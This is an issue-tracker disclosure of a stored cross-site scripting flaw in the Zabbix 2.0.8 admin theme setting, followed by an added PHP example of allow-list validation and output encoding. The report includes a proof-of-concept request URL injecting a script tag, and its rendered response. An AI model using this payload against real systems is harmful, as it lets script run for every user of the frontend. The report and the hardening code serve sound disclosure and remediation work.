Details

    • Type: Incident report
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.0.8
    • Fix Version/s: 2.0.9rc1, 2.1.5
    • Component/s: Frontend (F)
    • Labels:
      None
    • Environment:
      Ubuntu

Description

The default_theme is set by an administrative user who has access to adm.gui.php.

adm.gui.php:
    $configs = array(
        'default_theme' => get_request('default_theme'),
        ...
    );
    update_config($configs);

default_theme is not sanitized before being stored in the database.

page_header.php:
    $css = $config['default_theme'];
    <body class="<?php echo $css; ?>">

      Example:
      http://zabbixserver/zabbix/adm.gui.php?sid=f449c57db01c1234&form_refresh=1&form_refresh=1&default_theme=originalblue">test1234<script>alert("xss")</script>&dropdown_first_entry=1&dropdown_first_remember=1&search_limit=1000&max_in_table=50&event_ack_enable=1&event_expire=7&event_show_max=100&server_check_interval=10&save=Save

      (change sid to valid admin sid)

      Response:
      <body class="originalblue">
      test1234
      <script>
      alert("xss")
      </script>
      /main.css" />

page_header.php is included on every page:

blah@blah:/var/www/zabbix$ grep -i "page_header" ./*
./acknow.php:require_once dirname(__FILE__).'/include/page_header.php';
./actionconf.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.gui.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.housekeeper.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.iconmapping.php:require_once dirname(__FILE__).'/include/page_header.php';
....truncated....

      The theme saved is displayed for every user on every page, making this critical.

      Thanks

      -Lincoln
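The report above shows a value that is neither validated on the way into the database nor encoded on the way out. The following is an added example (not Zabbix's own code and not the fix that shipped in 2.0.9rc1 / 2.1.5) of the two controls a frontend needs here: an allow-list check when the administrator saves default_theme, plus HTML attribute encoding where page_header.php echoes it. The function names, the theme list and the simulated config store are assumptions made for the illustration.

```php
<?php
// Added example for the reported default_theme stored XSS. Not Zabbix code.
// allowed_themes(), validate_default_theme(), render_body_tag() and the
// $store array are hypothetical names chosen for this illustration.

function allowed_themes() {
    // Constructed allow-list. A real frontend should derive this from the
    // theme directories that actually exist on disk (e.g. scandir('styles')),
    // not from user input.
    return array('originalblue', 'darkblue', 'darkorange', 'classic');
}

// Write side (the adm.gui.php save path): accept only an exact, known theme
// name. Returns the canonical name, or null when the value must be refused.
function validate_default_theme($requested, array $allowed) {
    if (!is_string($requested)) {
        return null;
    }
    // Strict comparison: no type juggling, no prefix or substring matches,
    // so 'originalblue">...' is rejected even though it starts with a
    // legitimate theme name.
    return in_array($requested, $allowed, true) ? $requested : null;
}

// Read side (the page_header.php echo): encode for the HTML attribute
// context even when the value passed validation. ENT_QUOTES is required
// because the reported payload uses a double quote to leave class="...".
function render_body_tag($theme) {
    return '<body class="' . htmlspecialchars($theme, ENT_QUOTES, 'UTF-8') . '">';
}

// Simulated request and config store (constructed for the example).
$payload = 'originalblue">test1234<script>alert("xss")</script>';
$store   = array('default_theme' => 'originalblue');

// 1. Vulnerable path from the report: the value is stored and echoed
//    unchanged, so the <script> lands in every page for every user.
$store_vulnerable = array('default_theme' => $payload);
echo "vulnerable: " . '<body class="' . $store_vulnerable['default_theme'] . '">' . "\n";

// 2. Hardened write path: the payload never reaches the database.
$clean = validate_default_theme($payload, allowed_themes());
if ($clean === null) {
    echo "rejected: default_theme is not a known theme\n";
} else {
    $store['default_theme'] = $clean;
}

// 3. Hardened read path: whatever is stored is still encoded at output.
echo "hardened: " . render_body_tag($store['default_theme']) . "\n";

// 4. Defence in depth: if a bad value ever did reach the database (older
//    rows, direct DB edits), output encoding alone neutralises the
//    reported payload; the quote and angle brackets become entities.
echo "encoded legacy value: " . render_body_tag($payload) . "\n";
```

Run it with `php example.php`. The allow-list is the control that matters most for this bug, because a theme name is also used to build a stylesheet path and an encoded-but-bogus value would still break the page; output encoding is kept regardless so that a future code path that bypasses validation does not reopen the XSS.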

People

    • Assignee: iivs Ivo Kurzemnieks
    • Reporter: lincoln Lincoln
    • Votes: 0
    • Watchers: 1